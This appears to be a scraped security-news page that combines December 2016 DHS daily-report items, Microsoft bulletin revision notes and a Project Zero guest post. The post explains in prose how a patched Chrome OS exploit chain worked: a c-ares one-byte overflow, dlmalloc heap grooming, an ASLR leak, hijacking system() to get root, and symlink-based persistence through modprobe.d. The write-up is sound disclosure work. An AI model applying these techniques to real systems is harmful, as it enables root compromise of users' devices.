21. December 13, Help Net Security – (International) More Android-powered devices found with trojans in their firmware. Doctor Web security researchers discovered two types of downloader trojans incorporated in the firmware of several Android-powered devices that are used to deliver ad-showing apps that push users to download additional apps, and are capable of updating themselves, contacting their command and control (C&C) servers, receiving instructions on which apps to covertly download and run, and start running each time the device is turned on. One of the trojans, dubbed Android.Sprovider.7 was found inserted into the firmware of Lenovo smartphones and can open specified links in a browser, as well as show ads on top of apps and in the status bar, among other malicious actions. Source: https://www.helpnetsecurity.com/2016/12/13/android-devices-trojans-firmware/

22. December 13, Help Net Security – (International) 93% of SOC managers unable to triage all potential threats. Intel Security released a report after interviewing 400 Security Operations Center (SOC) managers across several countries, industries, and company sizes, which revealed that on average, organizations are unable to adequately investigate 25 percent of security alerts, as many as 93 percent of SOCs are unable to triage all potential threats, and that the most common threat detection signals for 64 percent of companies come from traditional security control points, including firewall and intrusion prevention systems, among other findings.
Source: https://www.helpnetsecurity.com/2016/12/13/soc-managers-triage-threats/

23. December 13, SecurityWeek – (International) Apple patches 12 vulnerabilities in iOS, tvOS, and watchOS. Apple released version 10.2 of its mobile operating system (iOS) resolving 12 vulnerabilities affecting several components in iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later, including a memory corruption issue in the Profiles component, which was also found to impact 4th generation Apple TV and all Apple Watch models, that could allow an attacker to achieve arbitrary code execution if the victim opened a specially crafted certificate on a vulnerable device.

Communications Sector
 
24. December 14, Help Net Security – (International) Netgear pushes out beta firmware for vulnerable router models. Netgear released a beta firmware to temporarily resolve a vulnerability affecting at least 12 of its router models after confirming the flaw could allow remote, unauthenticated attackers to execute Linux commands with root privileges on the routers if the commands are appended to the Uniform Resource Locator (URL) of a page that the user is tricked into visiting. Netgear is reviewing its router portfolio to determine if the flaw affects other router models. Source: https://www.helpnetsecurity.com/2016/12/13/netgear-firmware-vulnerable-routers/

Chrome OS exploit: one byte overflow and symlinks

The following article is an guest blog post from an external researcher (i.e. the author is not a Project Zero or Google researcher).

This post is about a Chrome OS exploit I reported to Chrome VRP in September. The Project Zero folks were nice to let me do a guest post about it, so here goes. The report includes a detailed writeup, so this post will have less detail.

1 byte overflow in a DNS library

In April I found a TCP port listening on localhost in Chrome OS. It was an HTTP proxy built into shill, the Chrome OS network manager. The proxy has now been removed as part of a fix, but its source can still be seen from an old revision: shill/http_proxy.cc. The code is simple and doesn’t seem to contain any obvious exploitable bugs, although it is very liberal in what it accepts as incoming HTTP. It calls into the c-ares library for resolving DNS. There was a possible one byte overflow in c-ares while building the DNS packet. Here is the vulnerable code, stripped heavily from its original to make the bug more visible:

ares_create_query.png

It parses dot-separated labels and writes them into a buffer allocated by malloc(). Each label is prefixed by a length byte and separating dots are omitted. The buffer length calculation is essentially just a strlen(). A dot that follows a label accounts for the length byte. The last label may or may not end with a dot. If it doesn’t, then the buffer length is incremented in the first black box to account for the length byte of the last label.

Dots may be escaped though and an escaped dot is part of a label instead of being a separator. If the last label ends with “\.”, an escaped dot, then the first black box wrongly concludes that the length byte of the last label has already been accounted for. The buffer remains short by one byte and the least significant byte of dnsclass overflows. The value of dnsclass is most commonly a constant 1.

Exploit from JavaScript?

Shill runs as root. A direct exploit from JavaScript would accomplish in a single step what might otherwise take three: renderer code execution -> browser code execution -> privesc to root. This means less work and fewer points of failure. It’s convenient that shill and chrome are separate processes, so if the exploit fails and crashes shill, it doesn’t bring down chrome and shill is restarted automatically. The direct exploit turned out to be possible, but with difficulties.

There doesn’t seem to be an obvious way to get chrome to place “\.” at the end of a Host header using HTTP. So instead the exploit uses the TURN protocol with WebRTC. It encodes what looks like HTTP into the username field of TURN. TURN is a binary protocol and it can only be used because HTTP parsing by the proxy is lax.

Also, shill is listening on a random port. The exploit uses TURN again, to scan the localhost ports. It measures connection time to determine if a port was open. The scan also runs into a surprising behavior explained nicely in here. If the source and destination TCP ports of a localhost connection attempt happen to match, then the kernel connects the socket to itself. Anything sent on a socket is received on the same socket. This causes false positives, so the scan must retry until a single port remains.

A more difficult issue is that there aren’t any decent memory grooming primitives. The proxy allocates the headers into a vector of strings. It applies minimal processing to the Via and Host headers, forwards the headers to another server and frees the them. It accepts a single client at a time. The number of headers is limited to <= 0x7f, header size is <= 0x800 bytes and TURN packet is <= 0x8000 bytes. The rough plan is to do rooming over 6 connections or stages. The problem is that different stages need to reliably place allocations at the same location. This is difficult because the memory layout changes between connections in ways that are hard to predict. The solution is to create what I call a persistent size 0x820 byte hole.

820 hole

First, it should be mentioned that shill uses dlmalloc, which is a best-fit allocator. malloc() uses the smallest free chunk that can fit the request. free() coalesces any neighboring free chunks.

Let’s look at the picture of grooming at stage 1. This creates a persistent hole of 0x820 bytes:

groom_820.png

Red means that the chunk is in use chunk and green means free. Cyan is the large top chunk of dlmalloc. The number on each chunk is the chunk size in hex. 0x is omitted. In the rest of this post, I’ll always refer to chunk sizes in hex, omitting 0x. Also, I’ll often refer to chunk sizes as nouns, which is a short way of referring to the chunk with such size. I’ll omit the actual grooming primitives used for these allocations, but for those interested, the Host and Via header processing in here is used.

So the first picture shows how the 820 hole is created. Four chunks of size 410 are allocated from the top chunk in [0-3]. In [5,6], the first 410 is freed and replaced with the backing allocation of the vector of headers. Even though the headers themselves are freed after stage 1 connection closes, the backing allocation of the vector is persistent across connections. The fourth 410 is also freed and the buffer for incoming server data is placed into it. It is also persistent across stages. Then the connection closes, the two 410 headers in the middle are freed and consolidated into 820.

Why is this 820 hole useful? It is persistent because the previous and following 410 are not freed between stages. Each stage can now start with the steps:

  • allocate the 820
  • eat all free holes up to the top chunk by doing tons of small allocations
  • free the 820

Let’s say a stage then allocates a small chunk of 100. dlmalloc uses the smallest free chunk, which is the 820, because smaller ones were allocated. Now let’s say the stage finishes and the 100 is freed. Next stage can use the same algorithm to place a 100 at the same location. This capability allows just enough grooming in stage 2 and 3 to get from one byte overwrite to overlapping chunks.

But things could go wrong. There might be another 820 hole by chance and different stages might allocate a different 820. Or it could happen that the tons of small allocations fail to eat all holes, because the amount of memory allocated per connection is limited. So the exploit attempts to get rid of most of the free chunks before stage 1 by combining different techniques. An interesting one perhaps is that it intentionally crashes shill. The process is restarted automatically and starts with a clean heap layout. It also uses two techniques to allocate lots of memory—more than what’s allowed by the limits mentioned above. I won’t go into details here though.

Overlapping chunks

Stage 2 triggers the memory corruption and stage 3 creates overlapping chunks:

groom_overlap.png

First, a 1e0 chunk is allocated in [10-12] by allocating 640, then 1e0 and then freeing 640. Then the query buffer of ares is allocated into the 110 slot at [13]. This leaves a free 530 in the middle. Now is a good time to take a closer look at the dlmalloc chunk header declared here:

malloc_chunk.png

This header is kept in front of each chunk. The 3 least significant bits of the size field are used as flags. Most importantly, lsb = 1 indicates that the previous chunk is in use. So looking at [13], the 530 chunk has size = 531 and 1e0 chunk has prev_size = 530. The prev_size field is only used when the previous chunk is free. Otherwise the previous chunk spans the prev_size field. This means that the size field of 530 immediately follows the query buffer in 110. The single byte that overflows the query buffer overwrites the least significant byte of the size field of 530: 0x31 -> 0x01. So the three flags are not affected. But chunk size is corrupted from 530 to 500 as can be seen from [14].

What’s interesting is that 1e0 doesn’t know anything about this corruption and its prev_size remains 530. Now, [15-17] split the free 500 into free 2e0 and in-use 220. But dlmalloc is already confused at this point. When it tries to update the prev_size of the chunk following 220, it’s off by 30 bytes from 1e0. And 1e0 keeps on believing that prev_size = 530. It also believes that the previous chunk is free even though 220 is in-use. So now in [18], 1e0 is freed. It tries to coalesce with a previous 530 chunk. There is a 2e0, where there used to be 530. dlmalloc is fine with that and creates a large 710 chunk that overlaps the 220.

These kind of overlapping chunks are relatively easy to exploit. They’re good both for breaking ASLR and getting RCE. This technique for going from a single byte overflow to overlapping chunks is not new. Chris Evans demonstrated it here in 2014 as part of an investigation for this Project Zero post. I’m not sure if anyone has demonstrated earlier.

What’s not shown in the picture for simplicity is that [14-15] is the boundary between stage 2 and 3. The memory corruption of stage 2 occurs in DNS code after Via and Host headers are processed, so no further grooming is possible. Stage 3 continues with grooming to get overlapping chunks. But the 110 query buffer is actually freed after stage 2. Stage 3 needs to reallocate a 110 chunk at the same location. The method described above is used.

ASLR

Stage 4 breaks ASLR. It first turns the overlapping 220 into a more convenient 810 chunk:

groom_810.png

So it allocates the 820, which overwrites the header of 220 and changes the size to 810. It’s interesting to note that the fd and bk pointers in the header of 220 are also overwritten. The exploit can’t afford to corrupt pointers at this point because it hasn’t broken ASLR. But fd and bk are only used when the chunk is free—they are used for a doubly linked freelist. [21] frees the overwritten chunk and dlmalloc finds it to be of size 810.

Next, two free 2a0 chunks are crafted into the 810:

groom_aslr.png

So 2a0 is allocated, 2d0 is allocated and 2a0 is freed. Now, the recently mentioned fd and bk pointers are leaked to break ASLR. The two 2a0 chunks have the same size and are placed into the same freelist. With additional grooming at the beginning of stage 4, the exploit can be certain that the two chunks are the only ones in this freelist. Well, there is also a third element linked in—the freelist head allocated statically from libc. So looking at the first 2a0, its fd and bk point to the other 2a0 and into libc. Also, the first 2a0 overlaps with 820, which contains an HTTP header that is forwarded to an attacker-controlled HTTP proxy. So that leaks two pointers that the proxy server forwards to JavaScript. The two pointers are used to calculate the address of 820 and the base address of libc.

To root

ASLR defeated, stages 5 and 6 get code execution:

groom_system.png

The rough idea is to overwrite a BindState which holds callback information—a function pointer and arguments. The function pointer is overwritten to point to system() in libc, the base address of which is known. And the first argument is overwritten to point to a shell command string crafted into the 820 slot, the address of which is also known. BindState chunk size is 40, so now, 810 is resized to 40. First, [25] frees 2d0, which consolidates to 810. For the 810 chunk to be placed into the size 40 freelist, it is removed from its current freelist by allocating it in [27]. 810 size is overwritten to 40 by freeing 820 in [26] and reallocating it with new data in [28]. [29] frees the resized 40 and [30] allocates a BindState into it. BindState now conveniently overlaps with 820. [31-32] reallocates 820 to corrupt the BindState to launch system(). The particular callback used triggers in 30 seconds and system() runs a shell command as root.

Persistence bug

It may sound surprising, but an attacker that has gained root on Chrome OS will lose the privileges after reboot. Chrome OS has verified boot. Bootloader in read-only memory verifies the kernel, which in turn verifies the hash of each disk block that it needs during runtime. This applies to the system partition which contains all the executable binaries, libraries and scripts. So an attacker can’t just set up a script to run at boot. But there is also a stateful partition that can be modified. It is intended for variable stuff like logs, configuration files and caches.

The way this exploit achieves persistence across reboots will sound familiar to anyone who’s read about this exploit by geohot. Both use symlinks, dump_vpd_log and modprobe. The dump_vpd_log script itself was fixed to not follow symlinks, but here is a snippet from /etc/init/ui-collect-machine-info.conf:

persistence_bug.png

/var is a stateful partition so UI_MACHINE_INFO_FILE can be turned into an arbitrary symlink. dump_vpd_log --full --stdout writes /mnt/stateful_partition/unencrypted/cache/vpd/full-v2.txt to stdout. This can be used to create an arbitrary file with arbitrary contents during boot. geohot used dump_vpd_log to write a command into /proc/sys/kernel/modprobe at boot so a following modprobe would execute the command. But there are some extra problems when trying to reuse this approach.

The first issue is that /var/run is a symlink to /run, which is a tmpfs and not persistent. The exploit makes /var/run persistent by relinking it to /var/real_run. Some parts of Chrome OS get confused by that and it is dealt with by using more symlinks. I’ll skip the details here.

modprobe.d config file

So now it’s possible to write into arbitrary files during boot. Another issue is that writing into /proc/sys/kernel/modprobe with dump_vpd_log won’t work in this case, because the following udevadm writes into the same file and its output can’t be controlled. The last write() syscall is what counts when writing into /proc/sys/kernel/modprobe. So instead, the exploit creates /run/modprobe.d, which is is a configuration file for modprobe. Parsing of modprobe.d is lax. Any line starting with "install modulename command..." specifies a command to execute when that module is loaded. Any lines that fail to parse are ignored.

Late modprobe

The final problem is that ui-collect-machine-info.conf runs late during boot, when all modprobing is complete. The created configuration file is not of much use. So the final trick is to find a way to trigger modprobe late during boot. The exploit creates a device file with mknod, which has a major number 173. 173 is unknown to the kernel, which means that when something accesses the device file, then the kernel will attempt to modprobe a handler module named char-major-173-0. Then it is sufficient to turn some commonly accessed file into a symlink to the device file and each access to the file will modprobe. The exploit uses /var/lib/metrics/uma-event.

There is yet one more issue. Stateful partitions are mounted with the nodev flag, which blocks access to device files. So the device has to be moved to /dev during startup. This code in /etc/init/cryptohomed.conf is used for that:

mv.png

The device is created as /mnt/stateful_partition/home/.shadow/attestation.epb and /mnt/stateful_partition/unencrypted/preserve/attestation.epb is turned into a symlink to /dev/net. This moves the device to /dev/net. /dev/net is used instead of /dev because cryptohomed changes the owner of the target attestation.epb. This would change the owner of the whole /dev directory and cause chrome to crash.

So that completes the Rube Goldberg machine of symlinks. dump_vpd_log creates /run/modprobe.d configuration file with a command to launch as root. cryptohomed moves a device file to /dev/net. Any generated metric accesses the uma-event symlink to the device, which launches modprobe, which launches a command from modprobe.d.

Patches


By now, the issues have been fixed pretty thoroughly. c-ares was patched in Chrome OS and upstream. The HTTP proxy was removed from shill. TURN implementation was hardened to block JavaScript from sending an arbitrary username to a localhost TCP port. And the symlink issues were fixed here, here, here and here.

Wednesday, December 14, 2016



Complete DHS Report for December 14, 2016

Daily Report                                            

Top Stories

• Officials reported December 12 that about 176,000 gallons of oil leaked from a 6-inch Belle Fourche Pipeline Co. pipeline into a tributary of the Little Missouri River and a hillside near Belfield, North Dakota. – Duluth News Tribune

2. December 12, Duluth News Tribune – (North Dakota) North Dakota oil pipeline spill estimated at 176,000 gallons. The North Dakota Department of Health announced December 12 that an estimated 176,000 gallons of oil leaked from a 6-inch Belle Fourche Pipeline Co. pipeline into a tributary of the Little Missouri River and a hillside near Belfield. Cleanup crews have recovered 36,876 gallons of oil since the leak was discovered by a landowner December 5. Source: http://www.duluthnewstribune.com/news/4178352-north-dakota-oil-pipeline-spill-estimated-176000-gallons

• Two New Jersey men were charged December 12 for allegedly orchestrating a securities fraud scheme that netted over $26 million in illegal proceeds. – Associated Press See item 6 below in the Financial Services Sector

• A Kansas couple pleaded guilty December 12 for their roles in a trade based money laundering conspiracy where the duo deposited at least $1.6 million in undeclared cash and $5.2 million worth of undeclared third-party checks into their joint account. – Garden City Telegram See item 7below in the Financial Services Sector

• Quest Diagnostics Incorporated is investigating December 12 after a third-party accessed an Internet application on its network November 26 and obtained the protected health information of roughly 34,000 patients. – WPXI 11 Pittsburgh

24. December 12, WPXI 11 Pittsburgh – (National) Quest Diagnostics says hackers obtained protected health information of 34,000 patients. Quest Diagnostics Incorporated announced December 12 that it is investigating after a third-party accessed the MyQuest by Care360 Internet application on the company’s network November 26 and obtained the protected health information of roughly 34,000 patients. Company officials stated there is no evidence that the patient information has been misused. Source: http://www.wpxi.com/news/quest-diagnostics-says-hackers-obtained-protected-health-information-of-34000-patients/475436855
  
Financial Services Sector

5. December 12, Boston Globe – (Massachusetts) Chelsea man charged with series of bank robberies. A man dubbed the “Spelling Bee Bandit” was charged December 12 for allegedly committing 4 bank robberies in the Greater Boston area between October and November 2016. Source: http://www.boston.com/news/crime/2016/12/12/chelsea-man-charged-with-series-of-bank-robberies

6. December 12, Associated Press – (National) 2 charged in securities fraud plot netting $26M illegally. Two New Jersey men were charged December 12 for allegedly orchestrating a securities fraud scheme that netted over $26 million in illegal proceeds by using dozens of brokerage accounts, some of which were listed in the names of family members or other individuals, to drive up the cost of $10 billion in securities, and subsequently sell the securities they owned at inflated prices. The duo was barred from future trading in securities on others’ accounts. Source: http://www.nytimes.com/aponline/2016/12/12/us/ap-us-securities-fraud-charges.html?_r=0

7. December 12, Garden City Telegram – (International) Meade couple pleads guilty to money laundering. A Meade, Kansas couple pleaded guilty December 12 for their roles in a trade based money laundering conspiracy where the duo deposited at least $1.6 million in undeclared cash and $5.2 million worth of undeclared third-party checks that the husband received from his trips to Mexico into a joint account they kept at Plains State Bank in Plains, Kansas. The couple would then transfer the funds in the account to buy genetically modified corn seed that was transported to Mexico. Source: http://www.gctelegram.com/news/local/meade-couple-pleads-guilty-to-money-laundering/article_28fc9c0d-4c89-51bf-bbac-296ba1163e7f.html

8. December 12, SecurityWeek – (International) Ostap backdoor installs banking trojans, PoS malware. Proofpoint security researchers reported that a newly spotted backdoor, dubbed Ostap was being leveraged by a threat group to install banking trojans such as Dridex, Ursnif, and Tinba, as well as point-of-sale (PoS) malware on devices belonging to financial services companies in several countries. Proofpoint found that the threat group leveraged spam emails with malicious Microsoft Word attachments for distribution, and the backdoor remains active on a targeted device after the Word attachment has been closed, and writes a copy of itself to the victim’s Startup folder for persistence, among other malicious actions. Source: http://www.securityweek.com/ostap-backdoor-installs-banking-trojans-pos-malware

For another story, see item 27 below in the Information Technology Sector

Information Technology Sector

27. December 13, SecurityWeek – (International) Flaw in PwC security tool exposes SAP systems to attacks. Security researchers at ESNC discovered PricewaterhouseCoopers’ Automated Controls Evaluator (ACE) tool was plagued with a remote code execution flaw that could be exploited to remotely inject and execute malicious Advanced Business Application Programming (ABAP) code on a targeted Systems, Applications and Products (SAP) system. The flaw could allow a malicious actor to manipulate accounting documents and financial results, bypass segregation of duties restrictions, and bypass change management controls, potentially resulting in fraud, theft or manipulation of sensitive data, and unauthorized payment transactions and transfer of money.

28. December 13, SecurityWeek – (International) Serious vulnerabilities found in McAfee Enterprise product. A security researcher discovered Intel Security’s McAfee VirusScan Enterprise for Linux (VSEL) product versions 2.0.3 and earlier are plagued by 10 vulnerabilities, including information disclosure flaws, cross-site request forgery (CSRF) bugs, remote code execution flaws, and privilege escalation issues, among others vulnerabilities, 4 of which can be chained to achieve remote code execution with root privileges. Intel Security advised users to upgrade to Endpoint Security for Linux (ENSL) 10.2 or later to avoid the flaws. Source: http://www.securityweek.com/serious-vulnerabilities-found-mcafee-enterprise-product

29. December 12, SecurityWeek – (International) Flaws allow remote hacking of Moxa MiiNePort devices. Moxa released firmware updates for its MiiNePort embedded serial device servers after a security researcher found the devices were plagued with two vulnerabilities, one of which can be exploited to brute-force an active session cookie and download a device’s configuration file containing sensitive information such as the administrator password remotely from the Internet, which could give a malicious actor unrestricted privileges and allow the attacker access to the device. The second vulnerability relates to how the configuration data is stored in a file without being encrypted. Source: http://www.securityweek.com/flaws-allow-remote-hacking-moxa-miineport-devices

30. December 12, SecurityWeek – (International) Users warned of Zcash miner infections. Kaspersky Lab reported that cybercriminals have covertly infected roughly 1,000 devices with software that mine for Zcash (ZEC), a new cryptocurrency worth about $49 per ZEC, in order to make a significant profit. Kaspersky Lab stated cybercriminals were disguising the miners as legitimate applications and distributing them via torrent Websites, and reported that no attempts to install the miners using Website vulnerabilities or email spam campaigns have been spotted.

31. December 12, SecurityWeek – (International) Alpha version of Sandboxed Tor Browser available for Linux. The Tor developer known as Yawning Angel released Sandboxed Tor Browser 0.0.2, a version of the browser designed to offer additional security to users as it traps exploits and prevents them from accessing files, real Internet Protocols (IPs) and media access control (MAC) addresses from the host. The developer warned the new version has unresolved issues affecting security and fingerprinting, and the application is only compatible with Linux systems as it leverages bubblewrap, a sandboxing utility for Linux.

Communications Sector

Nothing to report

MS15-094 – Critical: Cumulative Security Update for Internet Explorer (3089548) – Version: 1.1

Severity Rating: Critical
Revision Note: V1.1 (December 13, 2016): Bulletin revised to include an additional vulnerability, CVE-2015-2496. This is an informational change only. Customers who have successfully installed the updates do not need to take any further action..
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS16-126 – Moderate: Security Update for Microsoft Internet Messaging API (3196067) – Version: 2.0

Severity Rating: Moderate
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393 - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker successfully convinces a user of an affected system to visit a malicious or compromised website. Note that you must install two updates to be protected from the vulnerability discussed in this bulletin: The update in this bulletin, MS16-126, and the update in MS16-118.

MS16-124 – Important: Security Update for Windows Registry (3193227) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393 - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker can access sensitive registry information.

MS16-120 – Critical: Security Update for Microsoft Graphics Component (3192884) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393 - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync. The most serious of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

MS16-122 – Critical: Security Update for Microsoft Video Control (3195360) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393 - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker successfully convinces a user of an affected system to visit a malicious or compromised website. Note that you must install two updates to be protected from the vulnerability discussed in this bulletin: The update in this bulletin, MS16-116, and the update in MS16-104.

MS16-137 – Important: Security Update for Windows Authentication Methods (3199173) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves multiple vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege. To exploit this vulnerability, the attacker would first need to authenticate to the target, domain-joined system using valid user credentials. An attacker who successfully exploited this vulnerability could elevate their permissions from unprivileged user account to administrator.

MS16-142 – Critical: Cumulative Security Update for Internet Explorer (3198467) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-140 – Important: Security Update for Boot Manager (3193479) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow security feature bypass if an attacker installs an affected boot policy and bypasses Windows security features.

MS16-151 – Important: Security Update for Windows Kernel-Mode Drivers (3205651) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-150 – Important: Security Update for Secure Kernel Mode (3205642) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if a locally-authenticated attacker runs a specially crafted application on a targeted system. An attacker who successfully exploited the vulnerability could violate virtual trust levels (VTL).

MS16-144 – Critical: Cumulative Security Update for Internet Explorer (3204059) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-146 – Critical: Security Update for Microsoft Graphics Component (3204066) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

MS16-147 – Critical: Security Update for Microsoft Uniscribe (3204063) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Windows Uniscribe. The vulnerability could allow remote code execution if a user visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update addresses the vulnerabilities by correcting how the Windows Uniscribe handles objects in the memory.

MS16-145 – Critical: Cumulative Security Update for Microsoft Edge (3204062) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than users with administrative user rights.

MS16-138 – Important: Security Update for Microsoft Virtual Hard Disk Driver (3199647) – Version: 2.0

Severity Rating: Important
